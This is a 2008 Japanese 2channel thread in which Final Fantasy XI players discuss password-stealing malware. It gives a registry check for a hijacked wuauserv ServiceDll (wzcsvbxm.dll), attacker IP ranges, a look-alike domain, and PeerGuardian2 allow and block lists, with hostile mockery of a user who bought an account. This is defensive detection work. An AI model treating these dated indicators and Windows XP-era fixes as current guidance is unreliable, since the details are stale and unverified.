続行するには何かキーを押してください...
! REG.EXE VERSION 3.0
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters
ServiceDll REG_EXPAND_SZ C:\WINDOWS\system32\wuauserv.dll ←★
! REG.EXE VERSION 3.0
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet003\Services\wuauserv\Parameters
ServiceDll REG_EXPAND_SZ C:\WINDOWS\system32\wuauserv.dll ←★
! REG.EXE VERSION 3.0
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv\Parameters
ServiceDll REG_EXPAND_SZ C:\WINDOWS\system32\wuauserv.dll ←★
=========================================================================
[SC] GetServiceConfig SUCCESS
SERVICE_NAME: wuauserv
DESCRIPTION : Windows ←★
続行するには何かキーを押してください...
17 :既にその名前は使われています:2008/08/04(月) 16:39:33 ID:0brkH9mG
■レジストリからwzcsvbxm.dllを探す方法
スタート→ファイル名を指定して実行→regedit
HKEY_LOCAL_MACHINE\SYSTEM\ControlSetxxx(xxxは数字)\Services\wuauserv\Parametersと
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv\Parametersの中の
「ServiceDll」→「REG_EXPAND_SZ(種類)」の「データ」を確認
C:\WINDOWS\system32\wuauserv.dllならそのままクローズ(この件の感染はしていない)
C:\WINDOWS\system32\wzcsvbxm.dllなど上記以外のファイルが登録されていた場合、感染している可能性が極めて大。
まず安全な環境でパスを変更しwzcsvbxm.dllをwuauserv.dllに書き換えられるなら書き換える等の対策をする。
ただし、すぐに戻ってしまう報告もあるため修正後要確認。
本体(生成元)および感染ルートは現状不明なため、上記の修正をしたとしても完全に駆除されているか分かりませんので
最終的な回答は「感染が確認された場合はクリーンインストール推奨」ということになります。
スタート→ファイル名を指定して実行→regedit
HKEY_LOCAL_MACHINE\SYSTEM\ControlSetxxx(xxxは数字)\Services\wuauserv\Parametersと
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv\Parametersの中の
「ServiceDll」→「REG_EXPAND_SZ(種類)」の「データ」を確認
C:\WINDOWS\system32\wuauserv.dllならそのままクローズ(この件の感染はしていない)
C:\WINDOWS\system32\wzcsvbxm.dllなど上記以外のファイルが登録されていた場合、感染している可能性が極めて大。
まず安全な環境でパスを変更しwzcsvbxm.dllをwuauserv.dllに書き換えられるなら書き換える等の対策をする。
ただし、すぐに戻ってしまう報告もあるため修正後要確認。
本体(生成元)および感染ルートは現状不明なため、上記の修正をしたとしても完全に駆除されているか分かりませんので
最終的な回答は「感染が確認された場合はクリーンインストール推奨」ということになります。
18 :既にその名前は使われています:2008/08/04(月) 16:41:06 ID:0brkH9mG
ここまで「wzcsvbxm.dll」に対する臨時テンプレ
19 :既にその名前は使われています:2008/08/04(月) 16:59:10 ID:G5YpyjYw
20 :既にその名前は使われています:2008/08/04(月) 17:26:18 ID:qamyPg/T
>>1 お疲れ様ー
21 :既にその名前は使われています:2008/08/04(月) 18:05:37 ID:Ww9v6dMQ
>>6に張ってあるCow&Scorpionはアドウェアを堂々配布してる胡散臭いサイトなので注意。
22 :既にその名前は使われています:2008/08/04(月) 19:44:50 ID:exHYDJwf
■ おすすめ2ちゃんねる 開発中。。。 by FOX ★
このスレを見ている人はこんなスレも見ています。(ver 0.20)
【AMD/ATI】 HD4xxxシリーズ Part56 【RADEON】 [自作PC]
【G'zGEAR】 au WIN G'zOne W62CA by CASIO Part20 [携帯機種]
【G'zGEAR】 au WIN G'zOne W62CA by CASIO Part19 [携帯機種]
□自殺決行する前に身辺整理-11□ [メンヘルサロン]
Samurize Part 42 [ソフトウェア]
自殺するほどじゃないだろ・・・
このスレを見ている人はこんなスレも見ています。(ver 0.20)
【AMD/ATI】 HD4xxxシリーズ Part56 【RADEON】 [自作PC]
【G'zGEAR】 au WIN G'zOne W62CA by CASIO Part20 [携帯機種]
【G'zGEAR】 au WIN G'zOne W62CA by CASIO Part19 [携帯機種]
□自殺決行する前に身辺整理-11□ [メンヘルサロン]
Samurize Part 42 [ソフトウェア]
自殺するほどじゃないだろ・・・
23 :既にその名前は使われています:2008/08/04(月) 19:49:03 ID:rmZLQZYv
みんなで辞めようぜ
24 :886:2008/08/04(月) 19:50:49 ID:FRmdJN3c
垢買いしたのを垢ハックされて困ったDQNです。今帰宅しました。
とりあえず、今別垢からGMコールしてます・・・。
とりあえず、今別垢からGMコールしてます・・・。
25 :既にその名前は使われています:2008/08/04(月) 19:53:24 ID:tDKsZfXt
おまw
どうやって説明する気だよ
どうやって説明する気だよ
26 :既にその名前は使われています:2008/08/04(月) 19:56:38 ID:PP9RuoO3
相当おつむ怪しいね
27 :886:2008/08/04(月) 19:56:54 ID:FRmdJN3c
こうなったら、俺もBANされていいので、中華と一緒に自爆する覚悟。
個人情報言わなきゃ凍結できないと言われたら、上記の旨も伝える。
捨てアカからGMコールしてるからこれが無くなってもいい。
結局個人情報ないとGMコールも無駄になりますかね?
泣き寝入りしたほうがいいのかな?
個人情報言わなきゃ凍結できないと言われたら、上記の旨も伝える。
捨てアカからGMコールしてるからこれが無くなってもいい。
結局個人情報ないとGMコールも無駄になりますかね?
泣き寝入りしたほうがいいのかな?
28 :既にその名前は使われています:2008/08/04(月) 19:58:31 ID:PP9RuoO3
なんでRMTが無くならないか
なんで垢ハック無くならないのか
君みたいに買う人がいるからですよ
それがどうして同情とか得られると思います?
被害者気取って書き込む神経が分からないのです
なんで垢ハック無くならないのか
君みたいに買う人がいるからですよ
それがどうして同情とか得られると思います?
被害者気取って書き込む神経が分からないのです
29 :既にその名前は使われています:2008/08/04(月) 19:59:24 ID:tR7cH9Rz
実況されてもうぜーから結果だけ書け
1ヶ月後とかだろうけどな
1ヶ月後とかだろうけどな
30 :886:2008/08/04(月) 19:59:36 ID:FRmdJN3c
ま〜、なんというか中華にハックされたと思ってますが
ファーストオーナーからアカハックされたとウソ付かれて新しいパス貰って
入って・・。ってやられたらおしまいだな。
ffxi ahみたら、種族手売られてた履歴が合ったよ。
あと、モ75でデストもってんだけど、なぜかワーグバグナウ買った履歴が。ワカンネ・・・。
ファーストオーナーからアカハックされたとウソ付かれて新しいパス貰って
入って・・。ってやられたらおしまいだな。
ffxi ahみたら、種族手売られてた履歴が合ったよ。
あと、モ75でデストもってんだけど、なぜかワーグバグナウ買った履歴が。ワカンネ・・・。
31 :既にその名前は使われています:2008/08/04(月) 20:01:36 ID:+6H7B2aJ
なにこの脳みそ茹だってそうな人
ここに書き込む神経がわかりません
ここに書き込む神経がわかりません
32 :既にその名前は使われています:2008/08/04(月) 20:02:19 ID:0brkH9mG
ネタは前スレが埋まってないからそっちで推奨
33 :既にその名前は使われています:2008/08/04(月) 20:02:20 ID:gvYrTfIs
どうせそのキャラはお前が育てたわけじゃねーんだし、気にするなよ。
また買えばいいだろ、な^^
そしたらキャラ名教えてくれよな^^
また買えばいいだろ、な^^
そしたらキャラ名教えてくれよな^^
34 :886:2008/08/04(月) 20:05:09 ID:FRmdJN3c
35 :既にその名前は使われています:2008/08/04(月) 20:09:45 ID:ML+ODa/g
FRmdJN3cは ここで何したいわけ?
アカ買いが書き込んでも荒れるだけなんだけど荒らしたいの?
アカ買いが書き込んでも荒れるだけなんだけど荒らしたいの?
36 :既にその名前は使われています:2008/08/04(月) 20:13:24 ID:MygMqC2M
無くならない垢買いの抑制になるかもしれないから、書き込むくらいは良いんじゃないかな。
実況や言い訳はいらないから、結果だけ宜しく。
鯖とキャラ名も教えてくれればサーチして、今一緒にいるやつが犯人!って分かるかもだけど。
実況や言い訳はいらないから、結果だけ宜しく。
鯖とキャラ名も教えてくれればサーチして、今一緒にいるやつが犯人!って分かるかもだけど。
37 :既にその名前は使われています:2008/08/04(月) 20:14:03 ID:rmZLQZYv
俺もハクられたんで即PCクリーンインスコして
パスワード再発行してもらって即POL退会したよ
100%安全でない限りまた垢ハックされる事もありえるんで
自宅PCからインターネットに繋ぐのも辞めるつもり
パスワード再発行してもらって即POL退会したよ
100%安全でない限りまた垢ハックされる事もありえるんで
自宅PCからインターネットに繋ぐのも辞めるつもり
38 :既にその名前は使われています:2008/08/04(月) 20:15:17 ID:0brkH9mG
★「巻き戻し情報」「スクエニ社に法的責任を!」や「誰が悪いかランキング」「被害者の会を作れ」は別スレでお願いします。
●● FF11垢ハック巻き戻し状況報告スレ ●●(←別スレ)
http://changi.2ch.net/test/read.cgi/ogame/1216987350/
●● FF11垢ハック巻き戻し状況報告スレ ●●(←別スレ)
http://changi.2ch.net/test/read.cgi/ogame/1216987350/
39 :既にその名前は使われています:2008/08/04(月) 20:26:05 ID:gvYrTfIs
40 :既にその名前は使われています:2008/08/04(月) 20:31:52 ID:zvOMnz9k
41 :886:2008/08/04(月) 20:38:49 ID:FRmdJN3c
>>40
でも前衛ジョブ2個75で、大袖とかもってるのに38,000円で買えたからな。
でも前衛ジョブ2個75で、大袖とかもってるのに38,000円で買えたからな。
42 :既にその名前は使われています:2008/08/04(月) 20:40:34 ID:gvYrTfIs
バカじゃねーの…。
結局それじゃねーか。
それはお前が育てたジョブとはいえねーよ。
結局それじゃねーか。
それはお前が育てたジョブとはいえねーよ。
43 :既にその名前は使われています:2008/08/04(月) 20:42:50 ID:+6H7B2aJ
44 :886:2008/08/04(月) 20:45:27 ID:FRmdJN3c
GMコールしたら、ワールドとキャラ名だけで一時凍結してくれたよ!
復帰は出来ないが、これで俺も二度と復帰できない、中華も使えない。
まあ、中華は他の奴にアイテム、ギルを送ったかもだがな・・・。
こんな感じで今回の騒動は終わりました。
俺と同じ状況の人いたらご参考に。
では・・・。リアルで頑張って生きます。
復帰は出来ないが、これで俺も二度と復帰できない、中華も使えない。
まあ、中華は他の奴にアイテム、ギルを送ったかもだがな・・・。
こんな感じで今回の騒動は終わりました。
俺と同じ状況の人いたらご参考に。
では・・・。リアルで頑張って生きます。
45 :既にその名前は使われています:2008/08/04(月) 20:46:07 ID:0brkH9mG
うざいな垢買い推奨の業者め
46 :既にその名前は使われています:2008/08/04(月) 20:47:12 ID:45uPIC7b
やはり前スレ886は、ただのバカだったか……
今どきアンチウィルスソフト入れてない、WinUpdateすらしてないなんて、
いくら何でも正常じゃないとは思っていたが……。
今どきアンチウィルスソフト入れてない、WinUpdateすらしてないなんて、
いくら何でも正常じゃないとは思っていたが……。
47 :既にその名前は使われています:2008/08/04(月) 20:48:03 ID:+6H7B2aJ
>>46
その上アカ買って自慢してる馬鹿ですし、お寿司
その上アカ買って自慢してる馬鹿ですし、お寿司
48 :既にその名前は使われています:2008/08/04(月) 20:49:41 ID:DqQuyrYF
垢買ってる時点で中華と同類
49 :既にその名前は使われています:2008/08/04(月) 20:50:08 ID:6tA7JQO+
だな。
垢買った理由が謎すぎる。
ってことで、GMコールの結果と
垢の値段・買った理由をよろしく。
垢買った理由が謎すぎる。
ってことで、GMコールの結果と
垢の値段・買った理由をよろしく。
50 :既にその名前は使われています:2008/08/04(月) 20:52:11 ID:grKfPZZW
973 :既にその名前は使われています :2008/08/04(月) 17:16:49 ID:j2hDP0O9
2台のPCでちょっと試したんだが・・・
メンバーパスワードとか、セキュリティ設定とかって、なんの意味もないのな。
片方のPCで上記のものを設定しても、もう片方のPCで、全く関係なくログイン可能。
2台のPCでちょっと試したんだが・・・
メンバーパスワードとか、セキュリティ設定とかって、なんの意味もないのな。
片方のPCで上記のものを設定しても、もう片方のPCで、全く関係なくログイン可能。
51 :既にその名前は使われています:2008/08/04(月) 20:52:23 ID:6tA7JQO+
俺リロード汁orz
52 :既にその名前は使われています:2008/08/04(月) 20:52:30 ID:gvYrTfIs
/anonシーフで低レベル狩り場を乱獲しまくった886の姿が目に浮かぶぜ…。
53 :既にその名前は使われています:2008/08/04(月) 20:54:16 ID:hOY9+EVV
ギルを買うとかツール使うとかということをやろうという感覚がさっぱりわからんのよね
過ぎたことを望まないでおけば普通に遊べる世界だろうに
まあ、レベル75がないと満足に動けないという人もいるかもだけど・・
過ぎたことを望まないでおけば普通に遊べる世界だろうに
まあ、レベル75がないと満足に動けないという人もいるかもだけど・・
54 :既にその名前は使われています:2008/08/04(月) 20:54:49 ID:rmZLQZYv
中華は垢を売るから
同類じゃなくて中華のお客さんなんじゃ
同類じゃなくて中華のお客さんなんじゃ
55 :既にその名前は使われています:2008/08/04(月) 21:00:10 ID:DqQuyrYF
アカハクの根っこにある「RMT市場」に関与してる時点で中華と同類
と ここまで噛み砕いて書いてあげないと理解できませんか
と ここまで噛み砕いて書いてあげないと理解できませんか
56 :既にその名前は使われています:2008/08/04(月) 21:05:39 ID:rmZLQZYv
なんでそんなにイラついてんの
57 :既にその名前は使われています:2008/08/04(月) 21:13:08 ID:RX6QHB2D
RMTサイトでギル買ってパス抜き感染後
後でアカごとごっそりうまーな業者の図式な訳ですね
なりふり構わない業者オソロシス
後でアカごとごっそりうまーな業者の図式な訳ですね
なりふり構わない業者オソロシス
58 :既にその名前は使われています:2008/08/04(月) 21:15:40 ID:9cL1xZhV
もちつけ
59 :既にその名前は使われています:2008/08/04(月) 21:16:08 ID:tR7cH9Rz
そして886みたいな奴が買うわけですね
60 :886:2008/08/04(月) 21:19:44 ID:FRmdJN3c
>>49
分かった。
アカ買った理由は・・・。実は2002年に初めて、2005年で辞めたキャラが居た。
それ解約して人に売ったんだよ。
2007年になって急にやりたくなった。でも前に使ったキャラ売った、困った。
俺のキャラに似てるのをヤフオクで探すと見つかった。じゃこれ買った。
約1年手塩を掛けて育てた。38000円で買って、今は8万くらいの価値のあるアカになった。
RMTで買わず、1000万ギルためたし。
分かった。
アカ買った理由は・・・。実は2002年に初めて、2005年で辞めたキャラが居た。
それ解約して人に売ったんだよ。
2007年になって急にやりたくなった。でも前に使ったキャラ売った、困った。
俺のキャラに似てるのをヤフオクで探すと見つかった。じゃこれ買った。
約1年手塩を掛けて育てた。38000円で買って、今は8万くらいの価値のあるアカになった。
RMTで買わず、1000万ギルためたし。
61 :既にその名前は使われています:2008/08/04(月) 21:22:20 ID:tR7cH9Rz
キャラ買いの上にキャラ売りかよ
どうしようもないな
どうしようもないな
62 :既にその名前は使われています:2008/08/04(月) 21:23:16 ID:gvYrTfIs
おいおい、どんどん話がうさんくさくなってきたな。
63 :既にその名前は使われています:2008/08/04(月) 21:23:16 ID:P9R5gJAK
いい加減にしろ 犯罪者の愚痴聞いてやるスレじゃねぇんだよ
64 :既にその名前は使われています:2008/08/04(月) 21:28:04 ID:qamyPg/T
>>前866 お疲れ様。
もう来ないだろうけど、そのアカウントをいつ頃買ったかとウィンドウズXPが正規版かどうかは知りたかったな。
もう来ないだろうけど、そのアカウントをいつ頃買ったかとウィンドウズXPが正規版かどうかは知りたかったな。
65 :既にその名前は使われています:2008/08/04(月) 21:29:25 ID:gvYrTfIs
つか、LSメンには連絡絶対しないほうがいいな。
こんな糞野郎がリーダーだったと知ったら、さぞ嫌な思いをするだろうから。
こんな糞野郎がリーダーだったと知ったら、さぞ嫌な思いをするだろうから。
66 :既にその名前は使われています:2008/08/04(月) 21:29:48 ID:G5YpyjYw
どうせまた垢買うんだろ。こいつは。
67 :既にその名前は使われています:2008/08/04(月) 21:32:01 ID:WJhuRYeO
もう構ってチャンに構うのはやめろww 話が全然関係ない方向に行き過ぎる
68 :既にその名前は使われています:2008/08/04(月) 21:33:09 ID:Y7tMkrCf
思わぬ落とし穴ってかんじだなー
69 :既にその名前は使われています:2008/08/04(月) 21:45:24 ID:45uPIC7b
どうも前スレ886は、後でボロボロいろんな話が出て来るし、釣りくさいなあw
釣りでなければ、真性の既知害だわw
釣りでなければ、真性の既知害だわw
70 :既にその名前は使われています:2008/08/04(月) 21:58:15 ID:ATCRK6rk
38000円もあれば旨いメシ食いに行くとか、服買うとかすりゃいいのに何でゲームのキャラなんか買うんだ
他人が育てたキャラなんぞキモくね?
それともアカ買いするバカは根本的に感覚が違うのか。モラルが特ア並みに無いのは分かってるが
ところでネタじゃなければ866のPCはウィルスだらけだろうからクリーンインスコしとけ
不特定多数にお前の情報が送信されてる可能性もあるぞw
他人が育てたキャラなんぞキモくね?
それともアカ買いするバカは根本的に感覚が違うのか。モラルが特ア並みに無いのは分かってるが
ところでネタじゃなければ866のPCはウィルスだらけだろうからクリーンインスコしとけ
不特定多数にお前の情報が送信されてる可能性もあるぞw
71 :既にその名前は使われています:2008/08/04(月) 22:00:54 ID:eTuTIoLg
垢買いは普通じゃないどこかの社長さんとかどこかの議員さんの息子とか芸能人の駄目息子とか
その辺が買うんです。
FFに限らずネットゲームはみんなそうなんだとさw
平気で数十万とか出すらしいですぜ。流石に一般人はRMT止まりかと、、
その辺が買うんです。
FFに限らずネットゲームはみんなそうなんだとさw
平気で数十万とか出すらしいですぜ。流石に一般人はRMT止まりかと、、
72 :既にその名前は使われています:2008/08/04(月) 22:19:47 ID:tR7cH9Rz
垢買いもRMTの一形態でしょ
73 :既にその名前は使われています:2008/08/04(月) 22:57:04 ID:2OlqsGjj
>>70
ヒント:価値観は人それぞれ
ヒント:価値観は人それぞれ
74 :既にその名前は使われています:2008/08/04(月) 23:10:02 ID:45uPIC7b
気軽なワールド移転の実装が、確実に垢買いに拍車をかけたよなあ・・・
75 :既にその名前は使われています:2008/08/04(月) 23:16:40 ID:zvOMnz9k
取りあえず、垢買うとこうなるのねw
おつでした〜w今度は1からやりましょう〜
おつでした〜w今度は1からやりましょう〜
76 :既にその名前は使われています:2008/08/04(月) 23:21:41 ID:CbtlXcko
コイツの場合1からやってもハクられてた悪寒w
77 :既にその名前は使われています:2008/08/04(月) 23:41:06 ID:6NYQUikD
価値観云々よりも、このスレに書ける神経が異常。
何を考えていたんだろうね・・・馬鹿というより、異常者としか思えない件。
あ、ここは2ちゃんねるだtt
何を考えていたんだろうね・・・馬鹿というより、異常者としか思えない件。
あ、ここは2ちゃんねるだtt
78 :既にその名前は使われています:2008/08/04(月) 23:46:45 ID:T0KBlXzu
PG2入れたんだがFFの許可リストってやつくれ?
79 :既にその名前は使われています:2008/08/04(月) 23:50:26 ID:45uPIC7b
今北産業の人のために、前スレ886の異常者っぷりの解説。
>902 :886:2008/08/04(月) 14:41:57 ID:FRmdJN3c
> ●使用ブラウザIE バージョンは分かりません。
> ●WindowsUpdateの有無 してません。
> ●FlashPlayerとRealPlayerのバージョン わかりません。
> ●アンチウイルスソフト 使ってません。
> ●その他のSecurty対策(Spybot S&D、ルータ、等) してません。
> ●PeerGuardian2の導入(有/無・有りの場合は参照元サイトはどこか) 無
垢買い以前に、垢ハクされて当然だっつーのwwww
>902 :886:2008/08/04(月) 14:41:57 ID:FRmdJN3c
> ●使用ブラウザIE バージョンは分かりません。
> ●WindowsUpdateの有無 してません。
> ●FlashPlayerとRealPlayerのバージョン わかりません。
> ●アンチウイルスソフト 使ってません。
> ●その他のSecurty対策(Spybot S&D、ルータ、等) してません。
> ●PeerGuardian2の導入(有/無・有りの場合は参照元サイトはどこか) 無
垢買い以前に、垢ハクされて当然だっつーのwwww
80 :既にその名前は使われています:2008/08/04(月) 23:52:03 ID:j7ZZp298
所詮ID:FRmdJN3c はカスってことw
81 :既にその名前は使われています:2008/08/04(月) 23:52:08 ID:bIktjNx8
いやいや垢買いRMTはゲームをより楽しくするスパイスみたいなもんじゃてぇぇw
垢ファックされるのは自分が間抜けなだけのはなしよwwwwwwwwwwwwwwww
垢ファックされるのは自分が間抜けなだけのはなしよwwwwwwwwwwwwwwww
82 :既にその名前は使われています:2008/08/04(月) 23:53:39 ID:bIktjNx8
間抜けにも一度ファックされ
たんだからよw次はないように注意していこうぜぇえぇえwwww
たんだからよw次はないように注意していこうぜぇえぇえwwww
83 :既にその名前は使われています:2008/08/05(火) 00:08:08 ID:3h9BYYKp
>>79
PCを家電やケータイやゲーム機感覚で購入した人は大体そんなものですよ。
PCを家電やケータイやゲーム機感覚で購入した人は大体そんなものですよ。
84 :既にその名前は使われています:2008/08/05(火) 00:09:10 ID:JAMu363a
リネ2は公式ページの目立つところにリンクを貼り
ウィルスの挙動まで含めた注意喚起を行いました
リネ2公式
ttp://lineage2.plaync.jp/
不正アクセスにご注意ください
ttp://lineage2.plaync.jp/bbs/view.aspx?bid=1&iid=7397
現在流行しているウイルスについて
ttp://lineage2.plaync.jp/bbs/view.aspx?bid=1&iid=7371
スクエニもこれくらいやってくだちい(´・ω・`)
ウィルスの挙動まで含めた注意喚起を行いました
リネ2公式
ttp://lineage2.plaync.jp/
不正アクセスにご注意ください
ttp://lineage2.plaync.jp/bbs/view.aspx?bid=1&iid=7397
現在流行しているウイルスについて
ttp://lineage2.plaync.jp/bbs/view.aspx?bid=1&iid=7371
スクエニもこれくらいやってくだちい(´・ω・`)
85 :既にその名前は使われています:2008/08/05(火) 00:29:17 ID:D096w8/H
86 :既にその名前は使われています:2008/08/05(火) 00:30:37 ID:XwUU9PeN
ROなんてマップ移動のロードのたびにRMT禁止と不正アクセス防止の絵が出てくるぞw
87 :既にその名前は使われています:2008/08/05(火) 00:39:02 ID:M9aqFk6+
福建中華のYouTubeモドキ再び。
Domain name: youtubles■net
fu jian long yan xi bizhen shi qiao tou cun 58hao
longyan FJ 364000
cn
気をつけてくれよな!
Domain name: youtubles■net
fu jian long yan xi bizhen shi qiao tou cun 58hao
longyan FJ 364000
cn
気をつけてくれよな!
88 :既にその名前は使われています:2008/08/05(火) 01:00:31 ID:A4FFR7Gl
Flashなどのブラウザプラグインを最新版に、IPAが7月の呼びかけ
http://internet.watch.impress.co.jp/cda/news/2008/08/04/20474.html
>>78
>>10
http://internet.watch.impress.co.jp/cda/news/2008/08/04/20474.html
>>78
>>10
89 :既にその名前は使われています:2008/08/05(火) 01:32:56 ID:U78qSbhe
>>78
PG2で許可FireWallもどきを作るにあたって、拒否側はP2Pリストをブロックに
登録でいいのかどうかがいまいち不明
バスター系ソフトのFireWallだと、POL.exeの通信先をexeの動作で固定できるけど
PG2だとどうなるのか、そこがわかってません
PG2で許可FireWallもどきを作るにあたって、拒否側はP2Pリストをブロックに
登録でいいのかどうかがいまいち不明
バスター系ソフトのFireWallだと、POL.exeの通信先をexeの動作で固定できるけど
PG2だとどうなるのか、そこがわかってません
90 :既にその名前は使われています:2008/08/05(火) 01:34:41 ID:EH+nxMLU
91 :既にその名前は使われています:2008/08/05(火) 01:39:35 ID:EpPmzqYt
自動更新ならWGA関係ないんだがな・・・w
92 :既にその名前は使われています:2008/08/05(火) 01:41:24 ID:U78qSbhe
>>87
福建中華が使っているIPは「61.139.0.0-61.139.127.255」ですね
ずっと追いかけて調べてましたけど、みんなソコにハマってました
リネ資のPG2拒否リストにしっかり入ってるから、間違って許可しなければ
大丈夫な気がする・・・
・・・って、ここに書いちゃってよかったかな
福建中華が使っているIPは「61.139.0.0-61.139.127.255」ですね
ずっと追いかけて調べてましたけど、みんなソコにハマってました
リネ資のPG2拒否リストにしっかり入ってるから、間違って許可しなければ
大丈夫な気がする・・・
・・・って、ここに書いちゃってよかったかな
93 :既にその名前は使われています:2008/08/05(火) 07:01:15 ID:dKrAcyfJ
>>78
以下の内容でテキストファイルを作成
FF11:61.195.48.0-61.195.55.255
FF11:61.195.56.0-61.195.59.255
FF11:61.195.60.0-61.195.63.255
FF11:202.67.48.0-202.67.63.255
FF11:219.117.144.0-219.117.159.255
このファイルをリストに登録してAllow(許可)にする事によってPC上のプログラムは
FFのアドレスに接続する事ができる。(他のファイルで拒否の登録がされていても)
以下の内容でテキストファイルを作成
ALLIP:0.0.0.0-255.255.255.255
このファイルをリストに登録してBlock(拒否)にするとPC上で走っているプログラムは
許可されているIP以外には一切接続できなくなる。
つまり、この二つをリストに追加する事で、君のPCはFF専用マシンになる。
以下の内容でテキストファイルを作成
FF11:61.195.48.0-61.195.55.255
FF11:61.195.56.0-61.195.59.255
FF11:61.195.60.0-61.195.63.255
FF11:202.67.48.0-202.67.63.255
FF11:219.117.144.0-219.117.159.255
このファイルをリストに登録してAllow(許可)にする事によってPC上のプログラムは
FFのアドレスに接続する事ができる。(他のファイルで拒否の登録がされていても)
以下の内容でテキストファイルを作成
ALLIP:0.0.0.0-255.255.255.255
このファイルをリストに登録してBlock(拒否)にするとPC上で走っているプログラムは
許可されているIP以外には一切接続できなくなる。
つまり、この二つをリストに追加する事で、君のPCはFF専用マシンになる。
94 :既にその名前は使われています:2008/08/05(火) 08:45:43 ID:Hm3tz/m8
あれ、PG2今でもDLできる? 昨日から試しているんだけど、画面真っ白になってできないけど。
ブラウザの設定きつくし過ぎているのかな。
ブラウザの設定きつくし過ぎているのかな。
95 :既にその名前は使われています:2008/08/05(火) 09:02:06 ID:LttZ30io
96 :既にその名前は使われています:2008/08/05(火) 09:09:19 ID:F90htN7b
なんの脈絡もなくヴァナモンとかなんなの?死ぬの?
97 :既にその名前は使われています:2008/08/05(火) 09:46:20 ID:o8qdC/V7
98 :既にその名前は使われています:2008/08/05(火) 10:35:37 ID:OhijuoY7
>>95はいつものヴァナモン粘着。
毎度毎度よく飽きないぜ。
毎度毎度よく飽きないぜ。
99 :既にその名前は使われています:2008/08/05(火) 10:40:59 ID:o8qdC/V7
マジかよ、クソったれ。
100 :既にその名前は使われています:2008/08/05(火) 10:54:35 ID:2ZePyXr+
PC起動するとPG2が韓国と台湾のIP弾いてるんだけど何かしらこれ
101 :既にその名前は使われています:2008/08/05(火) 11:10:46 ID:mSCO7I3W
こんにちは。リーダーに教えてもらってここへきました。
パソコンでFFをしています。
パソコンは家族で共用しているので、インターネットもみてます。
それで、最近パス抜きとかがあるというので不安に思っていたのですが、こないだからFFをやろうとすると
ウィルスバスターが不審な変更を拒否しましたという警報みたいな注意を出しています。
これは、うちのパソコンがウィルスにかかっちゃったということなのでしょうか。
いまFFでパスワードとか入力しないほうがいいですか?
パソコンでFFをしています。
パソコンは家族で共用しているので、インターネットもみてます。
それで、最近パス抜きとかがあるというので不安に思っていたのですが、こないだからFFをやろうとすると
ウィルスバスターが不審な変更を拒否しましたという警報みたいな注意を出しています。
これは、うちのパソコンがウィルスにかかっちゃったということなのでしょうか。
いまFFでパスワードとか入力しないほうがいいですか?
102 :既にその名前は使われています:2008/08/05(火) 11:23:38 ID:dKrAcyfJ
103 :既にその名前は使われています:2008/08/05(火) 11:26:17 ID:ZgQetQRD
>>101
テンプレを全部読むと恐怖に愕然とします
テンプレを全部読むと恐怖に愕然とします
104 :既にその名前は使われています:2008/08/05(火) 11:29:23 ID:Hm3tz/m8
>>101
自分専用のPC持てなければPCでFFするのやめた方がいいぞ。
極端な話ではなくFF関係ないサイトにすら罠仕込まれるのが現状。
ここで質問するより被害まとめサイト見た方がいい。
後半の質問にだけ返すとFFに関係ない無害な変更でも警告やブロックは出るから
一概に垢ハックかどうか判別できないね。
自分専用のPC持てなければPCでFFするのやめた方がいいぞ。
極端な話ではなくFF関係ないサイトにすら罠仕込まれるのが現状。
ここで質問するより被害まとめサイト見た方がいい。
後半の質問にだけ返すとFFに関係ない無害な変更でも警告やブロックは出るから
一概に垢ハックかどうか判別できないね。
105 :既にその名前は使われています:2008/08/05(火) 11:35:23 ID:HbaiKcB9
すまん疑問に思った事があるので誰か答えてくだしあ
PCが2台あったとする、FF含むPC(A)と低スペックのネットくらいしか見られんPC(B)
それで、Bが垢ハックウィルスに感染した場合、ルータ通してAに感染とかあるの?
最近兄貴がFF復帰して情報が欲しいとか言ってたんだが垢ハックあるから
ネットでFF関連調べるのやめとけとは言っておいたんだが、
やっぱ窮屈だろうなって事ではっきりしておきたかった
PCが2台あったとする、FF含むPC(A)と低スペックのネットくらいしか見られんPC(B)
それで、Bが垢ハックウィルスに感染した場合、ルータ通してAに感染とかあるの?
最近兄貴がFF復帰して情報が欲しいとか言ってたんだが垢ハックあるから
ネットでFF関連調べるのやめとけとは言っておいたんだが、
やっぱ窮屈だろうなって事ではっきりしておきたかった
106 :既にその名前は使われています:2008/08/05(火) 11:47:56 ID:ZGJBobt7
今の所LAN経由で感染する機能はを持ったものはないと思われる
今後そういうバージョンが出てくるかは不明
今後そういうバージョンが出てくるかは不明
107 :既にその名前は使われています:2008/08/05(火) 11:48:00 ID:dKrAcyfJ
>>105
可能性はある。まずPC間でのファイル共有などを全てオフにする。
XPでは初期状態はオンになっている。オフにする方法は自分で調べてくれ。
リモートアシスタント、リモートデスクトップもオフ。
PC(A)にPG2を導入して>>93を適用する。
PC(B)では既出の処置をする。Firefox&NoScript他
ルーター設定からUPnPって設定がある場合はオフにする。
PC(B)のサービスからSSDP Discovery ServiceとUniversal Plug and Play Device Hostをオフにする。
このぐらいすれば安心かな。
可能性はある。まずPC間でのファイル共有などを全てオフにする。
XPでは初期状態はオンになっている。オフにする方法は自分で調べてくれ。
リモートアシスタント、リモートデスクトップもオフ。
PC(A)にPG2を導入して>>93を適用する。
PC(B)では既出の処置をする。Firefox&NoScript他
ルーター設定からUPnPって設定がある場合はオフにする。
PC(B)のサービスからSSDP Discovery ServiceとUniversal Plug and Play Device Hostをオフにする。
このぐらいすれば安心かな。
108 :既にその名前は使われています:2008/08/05(火) 11:50:43 ID:mSCO7I3W
101を書き込んだものの母です。
>>102-103さん、ご回答ありがとうございました。
書き込んだ本人は張ってくださったリンク先をみたりもしたようですが、「テンプレ」がなにかわからなかったらしく私が呼ばれました(笑
さて、テンプレ内容ですが正直いって私にも少々内容が難しいので勉強しつつ、主人が戻りましたらこちらを見せてPCのチェック等をして対策したいと思います。
皆様、ご親切にご指導いただき本当にありがとうございました。
なお、最後になりますが娘がウィルスだといってメモったものがあるので、内容を書き込ませてください。
8/4 15:40 拒否 C:\Program Files\PlayOnline\squareEnix\PlayOnlineViewer\pol.exe
15:40 確認 C:\Program Files\PlayOnline\squareEnix\PlayOnlineViewer\pol.exe
種類:API Event
検出ソース/プロセスID:NtUserSetWindowsHookEx
